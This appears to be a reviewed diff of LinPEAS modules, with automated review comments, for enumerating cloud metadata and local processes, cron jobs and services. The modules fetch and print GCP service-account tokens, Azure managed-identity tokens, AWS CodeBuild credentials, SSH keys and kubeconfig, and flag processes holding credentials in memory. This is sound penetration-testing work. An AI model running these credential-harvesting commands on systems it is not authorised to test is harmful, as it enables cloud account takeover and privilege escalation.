fi
if [ "$aws_req" ]; then
print_3title "Credentials"
CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
print_3title "Container Info"
METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
fi
echo ""
fi
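Review bot: `grep "ECS_CONTAINER_METADATA_URI"` on `/codebuild/output/tmp/env.sh` also matches `ECS_CONTAINER_METADATA_URI_V4` when both are exported, so `METADATA_URL` can become two URLs joined by a newline and `exec_with_jq eval $aws_req "$METADATA_URL"` then passes both as arguments. Use `grep -w` (underscore is a word character, so `_V4` is excluded) and do the same for `AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`. If `env.sh` is unreadable, `CREDS_PATH` is empty and `URL_CREDS` silently becomes `http://169.254.170.2`; check the file exists first, as the `else` branch already points users at it. `cat file | grep ...` can be `grep ... file`; typo `begginig` in the comment.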


@ -0,0 +1,57 @@
# Title: Cloud - Google Cloud Function
# ID: CL_Google_cloud_function
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Google Cloud Function Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_gcp, print_2title, print_3title, print_info
# Global Variables: $is_gcp_function, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
# Initial Functions: check_gcp
# Generated Global Variables: $gcp_req, $p_id, $p_num, $inst_id, $inst_zone, $mtls_info
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_gcp_function" = "Yes" ]; then
gcp_req=""
if [ "$(command -v curl)" ]; then
gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
elif [ "$(command -v wget)" ]; then
gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
# GCP Enumeration
if [ "$gcp_req" ]; then
print_2title "Google Cloud Platform Enumeration"
print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
## GC Project Info
p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
[ "$p_id" ] && echo "Project-ID: $p_id"
p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
[ "$p_num" ] && echo "Project Number: $p_num"
# Instance Info
inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
[ "$inst_id" ] && echo "Instance ID: $inst_id"
mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)
[ "$mtls_info" ] && echo "MTLS info: $mtls_info"
inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
[ "$inst_zone" ] && echo "Zone: $inst_zone"
echo ""
print_3title "Service Accounts"
for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email")
echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases")
echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity")
echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token")
echo " ============== "
done
fi
fi
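Review bot: `$sa` is a loop variable this module creates but it is missing from `# Generated Global Variables:` (the GCP VM module has the same omission). The mTLS query uses a different host from everything else: `mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)` relies on the bare name `metadata` resolving, while all other requests use `metadata.google.internal`; use the FQDN for consistency. The token line prints the full service-account access token unredacted; that is intended for this tool, but a short comment saying so helps reviewers who copy the output into reports.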


@ -0,0 +1,111 @@
# Title: Cloud - Google Cloud VM
# ID: CL_Google_cloud_vm
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Google Cloud VM Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_gcp, print_2title, print_3title, print_info
# Global Variables: $is_gcp_vm, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
# Initial Functions: check_gcp
# Generated Global Variables: $gcp_req, $p_id, $p_num, $pssh_k, $p_attrs, $osl_u, $osl_g, $osl_sk, $osl_au, $inst_d, $inst_hostn, $inst_id, $inst_img, $inst_mt, $inst_n, $inst_tag, $inst_zone, $inst_k8s_loc, $inst_k8s_name, $inst_k8s_osl_e, $inst_k8s_klab, $inst_k8s_kubec, $inst_k8s_kubenv, $iface
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_gcp_vm" = "Yes" ]; then
gcp_req=""
if [ "$(command -v curl || echo -n '')" ]; then
gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
elif [ "$(command -v wget || echo -n '')" ]; then
gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$gcp_req" ]; then
print_2title "Google Cloud Platform Enumeration"
print_info "https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/index.html"
## GC Project Info
p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
[ "$p_id" ] && echo "Project-ID: $p_id"
p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
[ "$p_num" ] && echo "Project Number: $p_num"
pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
[ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
[ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
# OSLogin Info
osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
[ "$osl_u" ] && echo "OSLogin users: $osl_u"
osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
[ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
[ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
[ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
# Instance Info
inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
[ "$inst_d" ] && echo "Instance Description: "
inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
[ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
[ "$inst_id" ] && echo "Instance ID: $inst_id"
inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
[ "$inst_img" ] && echo "Instance Image: $inst_img"
inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
[ "$inst_mt" ] && echo "Machine Type: $inst_mt"
inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
[ "$inst_n" ] && echo "Instance Name: $inst_n"
inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
[ "$inst_tag" ] && echo "Instance tags: $inst_tag"
inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
[ "$inst_zone" ] && echo "Zone: $inst_zone"
inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
[ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
[ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
[ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
[ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
[ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
[ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
echo ""
print_3title "Interfaces"
for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do
echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
echo " Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
echo " DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
echo " ============== "
done
echo ""
print_3title "User Data"
echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
echo ""
echo ""
print_3title "Service Accounts"
for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do
echo " Name: $sa"
echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
echo " ============== "
done
fi
echo ""
fi
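Review bot: the instance description is fetched but never printed: `[ "$inst_d" ] && echo "Instance Description: "` omits `$inst_d`. The tags path is wrong: `instance/scheduling/tags` is not a metadata key (the `scheduling/` directory holds `automatic-restart`, `on-host-maintenance` and `preemptible`); network tags live at `instance/tags`, so `inst_tag` will always be empty. The service-account loop builds `.../service-accounts/$sa/email`, but the listing returns entries with a trailing slash (the Cloud Function module uses `${sa}email` for that reason), yielding `default//email`; align the two modules. `enable-oslogin` is an ordinary instance attribute, not GKE-specific, so the `inst_k8s_osl_e` name and "K8s OSLoging enabled" label (also a typo) are misleading. `echo $(eval $gcp_req ".../attributes/startup-script")` word-splits the startup script onto one line; print the value quoted instead. `$sa` is missing from Generated Global Variables.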


@ -0,0 +1,70 @@
# Title: Cloud - Azure VM
# ID: CL_Azure_VM
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Azure VM Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_az_vm, exec_with_jq, print_2title, print_3title
# Global Variables: $is_az_vm
# Initial Functions: check_az_vm
# Generated Global Variables: $API_VERSION, $HEADER, $az_req, $URL
# Fat linpeas: 0
# Small linpeas: 1
if [ "$is_az_vm" = "Yes" ]; then
print_2title "Azure VM Enumeration"
HEADER="Metadata:true"
URL="http://169.254.169.254/metadata"
API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
az_req=""
if [ "$(command -v curl || echo -n '')" ]; then
az_req="curl -s -f -L -H '$HEADER'"
elif [ "$(command -v wget || echo -n '')" ]; then
az_req="wget -q -O - --header '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$az_req" ]; then
print_3title "Instance details"
exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
echo ""
print_3title "Load Balancer details"
exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
echo ""
print_3title "User Data"
exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null
echo ""
print_3title "Custom Data and other configs (root needed)"
(cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED},"
echo ""
print_3title "Management token"
print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
echo ""
print_3title "Graph token"
print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
echo ""
print_3title "Vault token"
print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
echo ""
print_3title "Storage token"
print_info "It's possible to assign 1 system MI and several user MI to a VM. LinPEAS can only get the token from the default one. More info in https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm"
exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
echo ""
fi
echo ""
fi
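Review bot: the four `print_info` lines under the Management, Graph, Vault and Storage token titles (the `It's possible to assign 1 system MI and several user MI to a VM...` sentence) are identical and print the same link four times; print it once before the first token request, or drop the repeats, to keep the output readable. Separately, the User Data line pipes `exec_with_jq` output into `base64 -d 2>/dev/null`: the request asks for `format=text`, so the body is raw base64 rather than JSON, and the line only works if `exec_with_jq` passes non-JSON output through unchanged; if it does not, or the decode fails, the `2>/dev/null` hides the error and the section is silently empty. A comment stating that assumption, or calling `$az_req` directly for this one endpoint, would make the behaviour explicit.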

View File

@ -0,0 +1,46 @@
# Title: Cloud - Azure App Service
# ID: CL_Azure_app_service
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Azure App Service Enumeration
# License: GNU GPL
# Version: 1.0
# Functions Used: check_az_app, exec_with_jq, print_2title, print_3title
# Global Variables: $is_az_app,
# Initial Functions: check_az_app
# Generated Global Variables: $API_VERSION, $HEADER, $az_req
# Fat linpeas: 0
# Small linpeas: 0
API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
if [ "$is_az_app" = "Yes" ]; then
print_2title "Azure App Service Enumeration"
HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
az_req=""
if [ "$(command -v curl || echo -n '')" ]; then
az_req="curl -s -f -L -H '$HEADER'"
elif [ "$(command -v wget || echo -n '')" ]; then
az_req="wget -q -O - --header '$HEADER'"
else
echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
fi
if [ "$az_req" ]; then
print_3title "Management token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
echo
print_3title "Graph token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
echo
print_3title "Vault token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
echo
print_3title "Storage token"
exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
fi
echo ""
fi
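Review bot: the `# Global Variables:` header lists only `$is_az_app,` (with a dangling comma), but the body also reads `$IDENTITY_HEADER` (in `HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"`) and `$IDENTITY_ENDPOINT` in every token request; both are environment variables set by the App Service runtime, so list them so the header matches what the module actually depends on. Minor: this module uses bare `echo` between the token titles but `echo ""` at the end, and the VM module above uses `echo ""` throughout; pick one.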

View File

@ -1,380 +0,0 @@
####################################################
#-----) Processes & Cron & Services & Timers (-----#
####################################################
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Cleaned proccesses
print_2title "Cleaned processes"
if [ "$NOUSEPS" ]; then
printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
fi
print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
fi
if [ "$NOUSEPS" ]; then
print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
pslist=$(print_ps)
else
(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
cpid=$(echo "$psline" | awk '{print $2}')
caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
fi
fi
done
pslist=$(ps auxwww)
echo ""
#-- PCS) Binary processes permissions
print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
binW="IniTialiZZinnggg"
ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
if [ -w "$bpath" ]; then
binW="$binW|$bpath"
fi
done
ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
fi
echo ""
fi
CURRENT_USER_PIVOT_PID=""
if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
#-- PCS) Process opened by other users
print_2title "Processes whose PPID belongs to a different user (not root)"
print_info "You will know if a user can somehow spawn processes as a different user"
# Function to get user by PID
get_user_by_pid() {
ps -p "$1" -o user | grep -v "USER"
}
# Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
if [ "$ppid" = "0" ]; then
continue
fi
ppid_user=$(get_user_by_pid "$ppid")
if echo "$user" | grep -Eqv "$ppid_user|root$"; then
echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
if [ "$ppid_user" = "$USER" ]; then
CURRENT_USER_PIVOT_PID="$ppid"
fi
fi
done
echo ""
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Files opened by processes belonging to other users
if ! [ "$IAMROOT" ]; then
print_2title "Files opened by processes belonging to other users"
print_info "This is usually empty because of the lack of privileges to read other user processes information"
lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
echo ""
fi
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Processes with credentials inside memory
print_2title "Processes with credentials in memory (root req)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
echo ""
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Different processes 1 min
if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
temp_file=$(mktemp)
if [ "$(ps -e -o user,command 2>/dev/null)" ]; then
for i in $(seq 1 1210); do
ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05;
done;
sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},";
rm "$temp_file";
fi
echo ""
fi
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Cron
print_2title "Cron jobs"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
command -v crontab 2>/dev/null || echo_not_found "crontab"
crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
command -v incrontab 2>/dev/null || echo_not_found "incrontab"
incrontab -l 2>/dev/null
ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
atq 2>/dev/null
else
print_2title "Cron jobs"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \;
fi
echo ""
if ! [ "$SEARCH_IN_FOLDER" ]; then
if [ "$MACPEAS" ]; then
print_2title "Third party LaunchAgents & LaunchDemons"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
echo ""
print_2title "Writable System LaunchAgents & LaunchDemons"
find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
program=""
program=$(defaults read "$f" Program 2>/dev/null)
if ! [ "$program" ]; then
program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
fi
if [ -w "$program" ]; then
echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
fi
done
echo ""
print_2title "StartupItems"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
echo ""
print_2title "Login Items"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
echo ""
print_2title "SPStartupItemDataType"
system_profiler SPStartupItemDataType
echo ""
print_2title "Emond scripts"
print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
ls -l /private/var/db/emondClients
echo ""
fi
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PCS) Services
if [ "$EXTRA_CHECKS" ]; then
print_2title "Services"
print_info "Search for outdated versions"
(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
echo ""
fi
fi
if ! [ "$SEARCH_IN_FOLDER" ]; then
#-- PSC) systemd PATH
print_2title "Systemd PATH"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
echo ""
fi
#-- PSC) .service files
#TODO: .service files in MACOS are folders
print_2title "Analyzing .service files"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
fi
servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
printf "%s\n" "$servicebinpaths" | while read sp; do
if [ -w "$sp" ]; then
echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
fi
done
relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
